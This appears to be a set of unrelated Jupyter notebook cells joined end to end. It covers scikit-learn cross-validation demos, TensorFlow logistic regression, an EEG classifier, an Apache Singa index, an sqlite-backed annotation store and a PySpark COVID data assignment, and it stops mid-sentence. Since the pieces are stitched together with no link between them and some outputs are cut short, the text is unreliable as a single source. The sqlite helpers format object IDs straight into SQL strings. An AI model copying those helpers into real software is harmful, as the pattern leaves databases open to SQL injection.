outer_skf.split(data_x, data_y): aux_data_inner_x = data_x[train_outer] aux_data_inner_y = data_y[train_outer] aux_data_inner = data[train_outer] test_ = data[test] #print("a\n",aux_data_inner_x, "b\n", test_) for train_inner, valid in inner_skf.split(aux_data_inner_x, aux_data_inner_y): train_ = aux_data_inner[train_inner] valid_ = aux_data_inner[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\nTest\n", test_) iteration += 1it - 0 Train [[0 0] [2 0] [3 0] [7 1] [8 1] [9 1]] Valid [[4 0] [6 1]] Test [[1 0] [5 1]] it - 1 Train [[0 0] [2 0] [4 0] [6 1] [7 1] [9 1]] Valid [[3 0] [8 1]] Test [[1 0] [5 1]] it - 2 Train [[2 0] [3 0] [4 0] [6 1] [8 1] [9 1]] Valid [[0 0] [7 1]] Test [[1 0] [5 1]] it - 3 Train [[0 0] [3 0] [4 0] [6 1] [7 1] [8 1]] Valid [[2 0] [9 1]] Test [[1 0] [5 1]] it - 4 Train [[0 0] [1 0] [3 0] [6 1] [8 1] [9 1]] Valid [[4 0] [5 1]] Test [[2 0] [7 1]] it - 5 Train [[0 0] [1 0] [4 0] [5 1] [6 1] [9 1]] Valid [[3 0] [8 1]] Test [[2 0] [7 1]] it - 6 Train [[1 0] [3 0] [4 0] [5 1] [8 1] [9 1]] Valid [[0 0] [6 1]] Test [[2 0] [7 1]] it - 7 Train [[0 0] [3 0] [4 0] [5 1] [6 1] [8 1]] Valid [[1 0] [9 1]] Test [[2 0] [7 1]] it - 8 Train [[1 0] [2 0] [3 0] [7 1] [8 1] [9 1]] Valid [[4 0] [5 1]] Test [[0 0] [6 1]] it - 9 Train [[1 0] [2 0] [4 0] [5 1] [7 1] [9 1]] Vali[...]Monte Carlofrom sklearn.model_selection import ShuffleSplit shuffle = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0) iteration = 0 for train, valid in shuffle.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[4 0] [9 1] [1 0] [6 1] [7 1] [3 0] [0 0] [5 1]] Valid [[2 0] [8 1]] it - 1 Train [[1 0] [2 0] [9 1] [8 1] [0 0] [6 1] [7 1] [4 0]] Valid [[3 0] [5 1]] it - 2 Train [[8 1] [4 0] [5 1] [1 0] [0 0] [6 1] [9 1] [7 1]] Valid [[2 0] [3 0]] it - 3 Train [[9 1] [2 0] [7 1] [5 1] [8 1] [0 0] [3 0] [4 0]] Valid [[6 1] [1 0]] it - 4 Train [[7 1] [4 0] [1 0] [0 0] [6 1] [8 1] [9 1] [3 0]] Valid [[5 1] [2 0]]Stratified Monte Carlofrom sklearn.model_selection import StratifiedShuffleSplit sshuffle = StratifiedShuffleSplit(n_splits=5, test_size=0.2, random_state=0) iteration = 0 for train, valid in sshuffle.split(data_x, data_y): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [6 1] [3 0] [9 1] [2 0] [5 1] [1 0] [7 1]] Valid [[4 0] [8 1]] it - 1 Train [[9 1] [2 0] [7 1] [3 0] [6 1] [8 1] [1 0] [4 0]] Valid [[0 0] [5 1]] it - 2 Train [[8 1] [1 0] [7 1] [4 0] [9 1] [2 0] [0 0] [6 1]] Valid [[5 1] [3 0]] it - 3 Train [[2 0] [6 1] [0 0] [5 1] [8 1] [3 0] [7 1] [1 0]] Valid [[4 0] [9 1]] it - 4 Train [[5 1] [2 0] [8 1] [4 0] [9 1] [3 0] [7 1] [1 0]] Valid [[0 0] [6 1]]Time Seriesfrom sklearn.model_selection import TimeSeriesSplit tscv = TimeSeriesSplit(n_splits=3) iteration = 0 for train, valid in tscv.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[0 0] [1 0] [2 0] [3 0]] Valid [[4 0] [5 1]] it - 1 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] Valid [[6 1] [7 1]] it - 2 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1]] Valid [[8 1] [9 1]]Leave-P-Outfrom sklearn.model_selection import LeavePOut lpo = LeavePOut(p=2) iteration = 0 for train, valid in lpo.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0]] it - 1 Train [[1 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [2 0]] it - 2 Train [[1 0] [2 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [3 0]] it - 3 Train [[1 0] [2 0] [3 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [4 0]] it - 4 Train [[1 0] [2 0] [3 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [5 1]] it - 5 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[0 0] [6 1]] it - 6 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[0 0] [7 1]] it - 7 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[0 0] [8 1]] it - 8 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1]] Valid [[0 0] [9 1]] it - 9 Train [[0 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[1 0] [2 0]] it - 10 Train [[0[...]Leave-P-Group-Outfrom sklearn.model_selection import LeavePGroupsOut lpgo = LeavePGroupsOut(n_groups=2) iteration = 0 for train, valid in lpgo.split(data_x, data_y, groups=groups): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] it - 1 Train [[3 0] [4 0] [5 1]] Valid [[0 0] [1 0] [2 0] [6 1] [7 1] [8 1] [9 1]] it - 2 Train [[0 0] [1 0] [2 0]] Valid [[3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]]Leave-One-Outfrom sklearn.model_selection import LeaveOneOut loo = LeaveOneOut() iteration = 0 for train, valid in loo.split(data): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0]] it - 1 Train [[0 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[1 0]] it - 2 Train [[0 0] [1 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[2 0]] it - 3 Train [[0 0] [1 0] [2 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0]] it - 4 Train [[0 0] [1 0] [2 0] [3 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[4 0]] it - 5 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [6 1] [7 1] [8 1] [9 1]] Valid [[5 1]] it - 6 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [7 1] [8 1] [9 1]] Valid [[6 1]] it - 7 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [8 1] [9 1]] Valid [[7 1]] it - 8 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [9 1]] Valid [[8 1]] it - 9 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1] [6 1] [7 1] [8 1]] Valid [[9 1]]Leave-One-Group-Outfrom sklearn.model_selection import LeaveOneGroupOut logo = LeaveOneGroupOut() iteration = 0 for train, valid in logo.split(data_x, data_y, groups=groups): train_ = data[train] valid_ = data[valid] print("it - ",iteration,"\nTrain\n", train_, "\nValid\n", valid_, "\n") iteration += 1it - 0 Train [[3 0] [4 0] [5 1] [6 1] [7 1] [8 1] [9 1]] Valid [[0 0] [1 0] [2 0]] it - 1 Train [[0 0] [1 0] [2 0] [6 1] [7 1] [8 1] [9 1]] Valid [[3 0] [4 0] [5 1]] it - 2 Train [[0 0] [1 0] [2 0] [3 0] [4 0] [5 1]] Valid [[6 1] [7 1] [8 1] [9 1]]xterm_rgb=[[x[0], np.array([int('0x'+x[1][:2],0),int('0x'+x[1][2:4],0),int('0x'+x[1][4:6],0)])] for x in CLUT]diff=[[[y[0],np.sqrt((x-y[1]).dot(x-y[1]))] for y in xterm_rgb] for x in rgbarr] closest=[sorted(x,key=lambda x : x[1])[0][0] for x in diff] closestListing 5.5 - Using one-dimensional logistic regressionimport numpy as np import tensorflow as tf import matplotlib.pyplot as plt import tensorflow.math as math DTYPE = tf.float32 learning_rate = 0.01 training_epochs = 1000 momentum = 0.0 @tf.function def sigmoid(x): return tf.convert_to_tensor(1. / (1. + np.exp(-x))) x1 = np.random.normal(-4, 2, 1000) x2 = np.random.normal(4, 2, 1000) xs = np.append(x1, x2) ys = np.asarray([0.] * len(x1) + [1.] * len(x2)) plt.scatter(xs, ys) X = tf.constant(xs, dtype=DTYPE, name='x') Y = tf.constant(ys, dtype=DTYPE, name='y') w = tf.Variable([0., 0.], name='parameter', dtype=DTYPE) w @tf.function def y_model(): return tf.sigmoid(w[1] * X + w[0]) @tf.function def cost(): return math.reduce_mean( -Y * math.log(y_model()) -(1 - Y) * math.log(1 - y_model()) ) train_op = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=momentum) prev_err = 0 for epoch in range(training_epochs): train_op.minimize(cost, w) err, no = w.numpy() # if math.abs(prev_err - err) < 0.0001: # break prev_err = err w_val = w.numpy() w_val all_xs = np.linspace(-10, 10, 100) plt.plot(all_xs, math.sigmoid(all_xs * w_val[1] + w_val[0])) plt.scatter(xs, ys) plt.show()Apparently mean and sd of df_closed are 0 at this precision level!# loading in the validation data path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/eyesclosed_val.feather' df_closed_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/eyesopen_val.feather' df_open_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/mathematic_val.feather' df_math_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/memory_val.feather' df_memory_val = feather.read_feather(path) path = '/Users/asgnxt/mne-miniconda/mne_data/train_val_16/val_16/music_val.feather' df_music_val = feather.read_feather(path) # determine the number of samples in each dataframe print(df_closed.shape) print(df_open.shape) print(df_math.shape) print(df_memory.shape) print(df_music.shape) print(df_closed_val.shape) print(df_open_val.shape) print(df_math_val.shape) print(df_memory_val.shape) print(df_music_val.shape)(7076, 30000) (7076, 30000) (7259, 30000) (7259, 30000) (7076, 30000) (854, 30000) (854, 30000) (854, 30000) (854, 30000) (915, 30000)The training data is either 7076 or 7259 rows x 30000 columns. Given there are 61 channels of EEG, there are 7076 / 61 = 116 / 119 distinct recordings of 300 sec each (100 Hz sampling).Imagining an EEG 'frame' of 61 x 61 (61 channels x 610 ms); each row can be thought of as a movie with ~492 frames. Each activity has a training set of 492 x 116 or 492 x 119 frames of data from a subset of subjects and sessions# defining parameters for the model batch_size = 32 img_width = 61 img_height = 61 num_channels = 61 print(f'Number of channels: {num_channels}') # defining the number of samples num_samples = 30000 print(f'Number of samples: {num_samples}') # defining the number of frames num_frames = num_samples/num_channels print(f'image_size = 61 x 61') print(f'Number of images per row: {num_frames}') # defining the number of classes num_classes = 5 print(f'Number of classes: {num_classes}') # defining the number of epochs num_training_epochs = num_frames * 116 * num_classes print(f'num_training_epochs = {num_training_epochs.__round__()}') # create labels for each dataframe with float16 precision df_closed['label'] = 0 df_open['label'] = 1 df_math['label'] = 2 df_memory['label'] = 3 df_music['label'] = 4 df_closed_val['label'] = 0 df_open_val['label'] = 1 df_math_val['label'] = 2 df_memory_val['label'] = 3 df_music_val['label'] = 4 # force the labels to be float16 precision df_closed['label'] = df_closed['label'].astype('float16') df_open['label'] = df_open['label'].astype('float16') df_math['label'] = df_math['label'].astype('float16') df_memory['label'] = df_memory['label'].astype('float16') df_music['label'] = df_music['label'].astype('float16') df_closed_val['label'] = df_closed_val['label'].astype('float16') df_open_val['label'] = df_open_val['label'].astype('float16') df_math_val['label'] = df_math_val['label'].astype('float16') df_memory_val['label'] = df_memory_val['label'].astype('float16') df_music_val['label'] = df_music_val['label'].astype('float16') # ensure that the dataframes are correctly labeled df_music.head() # Creating lists from each dataframe, each list contains one frame of data list_df_closed = np.array_split(df_closed, 116) print(list_df_closed[0].shape) list_df_open = np.array_split(df_open, 116) print(list_df_open[0].shape) list_df_math = np.array_split(df_math, 119) print(list_df_math[0].shape) list_df_memory = np.array_split(df_memory, 119) print(list_df_memory[0].shape) list_df_music = np.array_split(df_music, 116) print(list_df_music[0].shape) list_df_closed_val = np.array_split(df_closed_val, 14) print(list_df_closed_val[0].shape) list_df_open_val = np.array_split(df_open_val, 14) print(list_df_open_val[0].shape) list_df_math_val = np.array_split(df_math_val, 14) print(list_df_math_val[0].shape) list_df_memory_val = np.array_split(df_memory_val, 14) print(list_df_memory_val[0].shape) list_df_music_val = np.array_split(df_music_val, 15) print(list_df_music_val[0].shape) # Create a training dataset with multiple sessions / subjects training_examples = [] for i in range(116): training_examples.append(list_df_closed[i]) training_examples.append(list_df_open[i]) training_examples.append(list_df_math[i]) training_examples.append(list_df_memory[i]) training_examples.append(list_df_music[i]) # Create a validation dataset with multiple sessions / subjects validation_examples = [] for i in range(14): validation_examples.append(list_df_closed_val[i]) validation_examples.append(list_df_open_val[i]) validation_examples.append(list_df_math_val[i]) validation_examples.append(list_df_memory_val[i]) validation_examples.append(list_df_music_val[i]) # defining parameters for the model batch_size = 32 img_width = 61 img_height = 61 target_size = (img_width, img_height) num_channels = 61 print(f'Number of channels: {num_channels}') # defining the number of samples num_samples = 30000 print(f'Number of samples: {num_samples}') # defining the number of frames num_frames = num_samples/num_channels print(f'image_size = 61 x 61') print(f'Number of images per row: {num_frames}') # defining the number of classes num_classes = 5 print(f'Number of classes: {num_classes}') # defining the number of epochs num_training_epochs = num_frames * 116 * num_classes print(f'num_training_epochs = {num_training_epochs.__round__()}') # creating a single training dataframe training_examples = pd.concat(training_examples) print(training_examples.shape) # creating a single validation dataframe validation_examples = pd.concat(validation_examples) print(validation_examples.shape) # ensuring uniform dtype training_examples.dtypes # create a separate target dataframe target = training_examples.pop('label') print(target.shape) print(target.head()) dataset_ts = tf.convert_to_tensor(training_examples) # dataset_ts_batches = dataset_ts.shuffle(buffer_size=10000).batch_size=batch_size #not working # Create a model model = tf.keras.Sequential([ tf.keras.layers.Flatten(input_shape=(30000, 1)), tf.keras.layers.Dense(128, activation=tf.nn.relu), tf.keras.layers.Dropout(0.2), tf.keras.layers.Dense(10, activation=tf.nn.softmax) ]) # Compile the model model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) # Train the model model.fit(dataset_ts, target, epochs=3)Epoch 1/3 1106/1106 [==============================] - 10s 9ms/step - loss: 1.6855 - accuracy: 0.1988 Epoch 2/3 1106/1106 [==============================] - 10s 9ms/step - loss: 1.6507 - accuracy: 0.1983 Epoch 3/3 1106/1106 [==============================] - 10s 9ms/step - loss: 1.6339 - accuracy: 0.1971Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements; and to You under the Apache License, Version 2.0. ![Apache Singa](http://singa.apache.org/en/_static/singa.png) Welcome to this tutorial for Apache Incubator-singa using Jupyter Notebook.Please install [PySINGA](http://singa.apache.org/en/docs/installation.htmlinstall-pysinga) before running these tutorials.1. [Regression](../en/docs/notebook/regression.ipynb )2. [MLP Tutorial](../en/docs/notebook/mlp.ipynb)3. [RBM Tutorial](../en/docs/notebook/rbm.ipynb)To learn more about Jupyter, please check [IPython in Depth](https://www.youtube.com/watch?v=xe_ATRmw0KM).If you want to use PySINGA and jupyter notebooks in virtual environment, please use conda virtual environment and install the following extension. Then you can select the kernel of the virtual environment in the browser.conda install nb_conda_kernelStorage#export import os import json import sqlite3 import copy from pathlib import Path from collections.abc import MutableMappingProject Structure setupjust to folders, first containing object (e.g images) to annotate and second foldercontains annotation data/results.#export def setup_project_paths(project_path:Path, image_dir='pics', label_dir=None): assert project_path.exists(), "Project path should point to " \ "existing directory" assert project_path.is_dir(), "Project path should point to " \ "existing directory" im_dir = Path(project_path, image_dir) results_dir = Path(project_path, 'results') results_dir.mkdir(parents=True, exist_ok=True) annotation_file_path = Path(results_dir, 'annotations.json') project_paths = (im_dir, annotation_file_path) if label_dir is not None: project_paths += (Path(project_path, label_dir),) return project_paths test_proj_path = Path('../data/test') setup_project_paths(test_proj_path) test_proj_path = Path('../data/test') setup_project_paths(test_proj_path, image_dir='ims', label_dir='labels') #export def get_image_list_from_folder(image_dir, strip_path=False): ''' Scans to construct list of existing images as objects ''' path_list = [Path(image_dir, f) for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir, f))] if strip_path: path_list = [p.name for p in path_list] return path_list get_image_list_from_folder('../data/mock/pics') get_image_list_from_folder('../data/mock/pics', strip_path=True)Generic Storage for Annotationskey values store- key, object_id / file_name- value json blob containing annotation#export class AnnotationStorage(MutableMapping): def __init__(self, im_paths): self.mapping = {} self.update({p.name: None for p in im_paths}) def __getitem__(self, key): return self.mapping[key] def __delitem__(self, key): if key in self: del self.mapping[key] def __setitem__(self, key, value): self.mapping[key] = value def __iter__(self): return iter(self.mapping) def __len__(self): return len(self.mapping) def __repr__(self): return f"{type(self).__name__}({self.mapping})" def save(self, file_name): with open(file_name, 'w', encoding='utf-8') as f: json.dump(self.mapping, f, ensure_ascii=False, sort_keys = True, indent=4) def load(self, file_name): with open(file_name) as data_file: self.mapping = json.load(data_file) def to_dict(self, only_annotated=True): if only_annotated: return {k: copy.deepcopy(v) for k, v in self.mapping.items() if v} else: return copy.deepcopy(self.mapping) im_paths = [Path('some/path', f) for f in ['name1', 'name2', 'name3']] storage = AnnotationStorage(im_paths) storage storage['name5'] = {'x': 5, 'y': 3, 'width': 7, 'height': 1} test_eq(storage['name5'], {'x': 5, 'y': 3, 'width': 7, 'height': 1}) len_before = len(storage) storage.pop('name1') test_eq(len(storage), len_before - 1) storage.to_dict() storage.to_dict(only_annotated=False) storage.save('/tmp/ttest.json') storage_from_file = AnnotationStorage([]) storage_from_file.load('/tmp/ttest.json') test_eq(storage, storage_from_file) storage test_eq(storage.get('name8', {'dict':'obj'}), {'dict':'obj'})DB backed storage- Changes in annotation should be tracked in db.- db - sqlite memory / disk, how to sync so that race conditons are avoided? - remote db (postgres, mysql etc.) with sqlalchemy layer write sqlite functions- init db- write json + timestamp to db BUT only if json has changed!- iterate over db- iterate over values with latest timestamp- get all history for key- allow for metadata?- check how sqlite write locks workimport sqlite3 #export def _list_tables(conn): query = """ SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'; """ c = conn.cursor() return c.execute(query).fetchall()```sqlDROP TABLE suppliers;CREATE TABLE suppliers ( supplier_id INTEGER PRIMARY KEY, supplier_name TEXT NOT NULL, group_id INTEGER NOT NULL, FOREIGN KEY (group_id) REFERENCES supplier_groups (group_id) );```conn = sqlite3.connect(":memory:") #export def _create_tables(conn): c = conn.cursor() query = """ CREATE TABLE IF NOT EXISTS data (objectID TEXT, timestamp DATETIME DEFAULT(STRFTIME('%Y-%m-%d %H:%M:%f', 'NOW')), data JSON, author TEXT, PRIMARY KEY (objectId, timestamp) ); """ c.execute(query) query = """ CREATE TABLE IF NOT EXISTS objects (objectID TEXT, orderID INTEGER PRIMARY KEY AUTOINCREMENT ) """ c.execute(query) conn.commit() #export def _list_table(conn, table_name='data', latest=True): if latest: query = """ SELECT * from {} GROUP BY objectID ORDER BY timestamp """.format(table_name) else: query = """ SELECT * from {} """.format(table_name) c = conn.cursor() return c.execute(query).fetchall() _create_tables(conn) _list_tables(conn)SQL helper functionsis needed for consistant iteration order#export def _get_order_id(conn, object_id, table_name='objects'): query = """ SELECT orderID from {} WHERE objectID = '{}' """.format(table_name, object_id) c = conn.cursor() res = c.execute(query).fetchone() if res is not None: return res[0] _get_order_id(conn, 'doesnt exist') #export def _create_order_id(conn, object_id, table_name='objects'): order_id = _get_order_id(conn, object_id, table_name=table_name) if order_id: return order_id query = """ INSERT INTO {}('objectID') VALUES('{}') """.format(table_name, object_id) c = conn.cursor() res = c.execute(query) return _get_order_id(conn, object_id, table_name=table_name) _create_order_id(conn, 'lala') _create_order_id(conn, 'lala') _create_order_id(conn, 'lala2') query = """ SELECT * from objects """ c = conn.cursor() res = c.execute(query).fetchall() res #export def _get(conn, object_id, table_name='data'): query = """ SELECT data FROM {} WHERE objectID = '{}' GROUP BY objectID ORDER BY timestamp """.format(table_name, object_id) c = conn.cursor() res = c.execute(query).fetchone() if res is not None: return json.loads(res[0]) #export def _get_object_id_at_pos(conn, pos, table_name='objects'): query = """ SELECT objectID FROM {} ORDER BY orderID LIMIT {}, 1 """.format(table_name, pos) c = conn.cursor() res = c.execute(query).fetchone() if res is not None: return res[0] _get_object_id_at_pos(conn, 1) #export def _insert(conn, object_id, data: dict, table_name='data', author='author'): # insert if values have been changed last = _get(conn, object_id) # if last is None: _create_order_id(conn, object_id) if data == last: return c = conn.cursor() c.execute("insert into {}('objectID', 'author', 'data') values (?, ?, ?)".format(table_name), [object_id, author, json.dumps(data)]) conn.commit() _insert(conn, 'lala3', {'crazy': 44}) _insert(conn, 'lala2', {'crazy': 40}) import time time.sleep(0.1) _insert(conn, 'lala3', {'crazy': 44 + 5}) _insert(conn, 'lala2', {'crazy': 40 + 5}) _list_table(conn, latest=False) _list_table(conn) # insert existing is ignored _insert(conn, 'lala2', {'crazy': 40 + 5}) _list_table(conn, latest=False) _get(conn, _get_object_id_at_pos(conn, 2)) #export def _to_dict(conn, table_name='data'): query = """ SELECT objectID, data from {} GROUP BY objectID ORDER BY timestamp """.format(table_name) c = conn.cursor() return {key: json.loads(value) for key, value in c.execute(query).fetchall()} _to_dict(conn) _get(conn, object_id="lala3") #export def _row_count(conn, table_name='data'): query = """ SELECT COUNT(DISTINCT objectID) FROM {} """.format(table_name) c = conn.cursor() res = c.execute(query).fetchone() return res[0] _row_count(conn) #export def _delete_last(conn, object_id, table_name='data'): query = """ DELETE FROM {} WHERE objectId = '{}' ORDER BY timestamp LIMIT 1 """.format(table_name, object_id) c = conn.cursor() res = c.execute(query) conn.commit() #export def _delete_all(conn, object_id, table_name='data'): query = """ DELETE FROM {} WHERE objectId = '{}' """.format(table_name, object_id) c = conn.cursor() res = c.execute(query) conn.commit() _list_table(conn, latest=False) _delete_last(conn, 'lala3') _list_table(conn, latest=False) _delete_all(conn, 'lala2') _list_table(conn, latest=False) _row_count(conn)Persistent Storage with history support#export class AnnotationStorageIterator: def __init__(self, annotator_storage): self.annotator_storage = annotator_storage self.index = 0 def __next__(self): try: result = self.annotator_storage.at(self.index) self.index += 1 except IndexError: raise StopIteration return result def next(self): return self.__next__() def prev(self): self.index -= 1 if self.index < 0: raise StopIteration return self.annotator_storage.at(self.index) #export class AnnotationDBStorage(MutableMapping): def __init__(self, conn_string, im_paths=None): self.conn = sqlite3.connect(conn_string) _create_tables(self.conn) if im_paths: self.update({p.name: {} for p in im_paths}) def update(self, dict_): for k, v in dict_.items(): _insert(self.conn, k, v) def __getitem__(self, key): item = _get(self.conn, key) if item is None: raise IndexError return item def get(self, key, default): if _get(self.conn, key) is None: return default def __delitem__(self, key): _delete_last(self.conn, key) def delete_all(self, key): _delete_all(self.conn, key) def at(self, pos): # bug fix needed when combined with del operations object_id = _get_object_id_at_pos(self.conn, pos) if object_id is None or pos < 0: raise IndexError return _get(self.conn, object_id) def __setitem__(self, key, value): _insert(self.conn, key, value) def __iter__(self): return AnnotationStorageIterator(self) def __len__(self): return _row_count(self.conn) def __repr__(self): return f"{type(self).__name__}({_list_table(self.conn)[:2] + [' ...']})" def to_dict(self): return _to_dict(self.conn) im_paths = [Path('some/path', f) for f in ['name1', 'name2', 'name3']] storage = AnnotationDBStorage(":memory:", im_paths) storage storage['name5'] = {'x': 5, 'y': 3, 'width': 7, 'height': 1} test_eq(storage.at(3), {'x': 5, 'y': 3, 'width': 7, 'height': 1}) test_eq(len(storage), 4) test_eq(storage['name5'], {'x': 5, 'y': 3, 'width': 7, 'height': 1}) myiter = iter(storage) for i in range(len(storage)): print(i, storage.at(i)) test_eq(storage.at(i), next(myiter)) myiter.prev() myiter.prev() myiter.next() for i in storage: print(i) len_before = len(storage) storage.pop('name1') test_eq(len(storage), len_before - 1) storage.to_dict() for i in range(len(storage)): print(i, storage.at(i)) # TODO delete objectID from object table if not anymore in data storage test_eq(storage.get('name8', {'dict':'obj'}), {'dict':'obj'}) storage.to_dict() #hide from nbdev.export import notebook2script notebook2script()**Assignment 1, Task 2**import findspark findspark.init() from pyspark.sql import SparkSession from pyspark.sql.functions import col, to_timestamp, to_date, countDistinct, udf, date_format, max as s_max, min as s_min from pyspark.sql.types import FloatType from scipy.spatial import distance from matplotlib import pyplot as plt import seaborn as sns import pandas as pd spark = SparkSession.builder.getOrCreate() df = spark.read.options(header=True, inferSchema=True).csv('raw\covid.csv')Data Explorationdf.printSchema() # create a date column df = df.withColumn("date", to_date(col("Date_Time"), "yyyy-MM-dd")) # sneak-peak at data df.limit(5).toPandas() # size and cols print((df.count(), len(df.columns))) # a look into a user's data df.select(['Date_Time', 'date', 'id', 'infection_status']).where(col('id') == '32645').limit(15).toPandas()Q1: Plot the total number of infections, recoveries and deaths w.r.t date?# select subset of columns q1 = df.select(['id', 'date', 'infection_status']).dropDuplicates() # group by infection status q1_agg_pdf = q1.groupBy(['date', 'infection_status']).agg(countDistinct('id').alias('people')).toPandas() # susceptible is not needed q1_agg_pdf = q1_agg_pdf[q1_agg_pdf['infection_status'] != 'susceptible'] # fix type q1_agg_pdf['date'] = q1_agg_pdf['date'].apply(pd.to_datetime) # sort q1_agg_pdf.sort_values('date', inplace=True) # visualize plt.figure(figsize=(12,6)) ax = sns.lineplot(x="date", y="people", hue="infection_status", data=q1_agg_pdf) plt.xticks(rotation=45)d:\workplace\environments\bigdata\lib\site-packages\pandas\plotting\_converter.py:129: FutureWarning: Using an implicitly registered datetime converter for a matplotlib plotting method. The converter was registered by pandas on import. Future versions of pandas will require you to explicitly register matplotlib converters. To register the converters: >>> from pandas.plotting import register_matplotlib_converters >>> register_matplotlib_converters() warnings.warn(msg, FutureWarning)Q2: Plot a pie chart for the ratio of asymptomatic and symptomatic infections# filter for infections infections = df.select(['id', 'is_symptomatic', 'infection_status']).where(col('infection_status') == 'infected') # aggregate is_symptomatic = infections.groupBy('is_symptomatic').agg(countDistinct('id').alias('people')).toPandas() is_symptomatic # visualize plt.figure(figsize=(12,6)) ax = plt.pie(is_symptomatic['people'], labels=['Symptomatic', 'Asymptomatic'], explode=(0, 0.1), autopct='%1.1f%%', shadow=True, startangle=90)Q3: Plot the variation of proximity of individual (ID=37415) w.r.t date. Assumptions* only date is to be considered while calculating proximity* questions is sort of pointed at knowing the variation of total number of people that a person was around at any location at any time of dayuser_id = 37415 # filter for user data user_data = df.select(['id', 'date', 'currentLocationID', 'currentLocationType']).where(col('id') == user_id) # prepare table to join temp_df = df.select(['id', 'date', 'currentLocationID', 'currentLocationType']) # join with full data to pick all people who shared location with 37415 on a date at any time joined = user_data.alias('user').join(temp_df.alias('proximity'), on=['date', 'currentLocationID', 'currentLocationType'], how='inner') # take count, i.e. aggregate proximity_pdf = joined.groupBy(['user.date', 'user.currentLocationID', 'user.currentLocationType']).agg(countDistinct('proximity.id').alias('proximity')).toPandas() proximity_pdf.sort_values('date', inplace=True) proximity_pdf.head() proximity_pdf.shape # day-level calculation final_proximity = proximity_pdf.groupby('date')['proximity'].sum() # visulize plt.figure(figsize=(12,6)) ax = final_proximity.plot() plt.xticks(rotation=30) sns.despine() plt.title('Proximity for {} w.r.t date'.format(user_id))Q4: Plot bar graphs to show the mortality rates and infection rates per age groups (create age groups 0-10, 10-20, and so on).age = df.select(['id', 'age', 'infection_status'])_**Age**_# group by age and infection status age_pdf = age.groupBy(['age', 'infection_status']).agg(countDistinct('id').alias('people')).toPandas() # sort data just to make more sense age_pdf.sort_values(by='age', inplace=True) # pivot in order to compute mortality rate age_pdf = age_pdf.pivot(index='age', columns='infection_status', values='people') # fill blanks with 0, just to simplify age_pdf.fillna(0, inplace=True) age_pdf.reset_index(inplace=True) age_pdf.rename_axis("index", axis="columns", inplace=True) bins = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100] age_pdf['age_bin'] = pd.cut(age_pdf['age'], bins=bins) final = age_pdf.groupby('age_bin', as_index=False).agg({'susceptible':'sum', 'infected':'sum', 'deceased':'sum'}) # claculate deceased ratio or mortality rate final['infection_rate'] = (final['infected'] / final['susceptible']) * 100 # claculate deceased ratio or mortality rate final['mortality_rate'] = (final['deceased'] / final['susceptible']) * 100 final.head() # visualize to check variation plt.figure(figsize=(12,6)) ax = sns.barplot(x="age_bin", y="infection_rate", data=final) plt.xticks(rotation=45) sns.despine() plt.title('Infection Rate w.r.t Age group') # visualize to check variation plt.figure(figsize=(12,6)) ax = sns.barplot(x="age_bin", y="mortality_rate", data=final) plt.xticks(rotation=45) sns.despine() plt.title('Mortality Rate w.r.t Age group')Q5: Visualize the number of individuals at a location on a 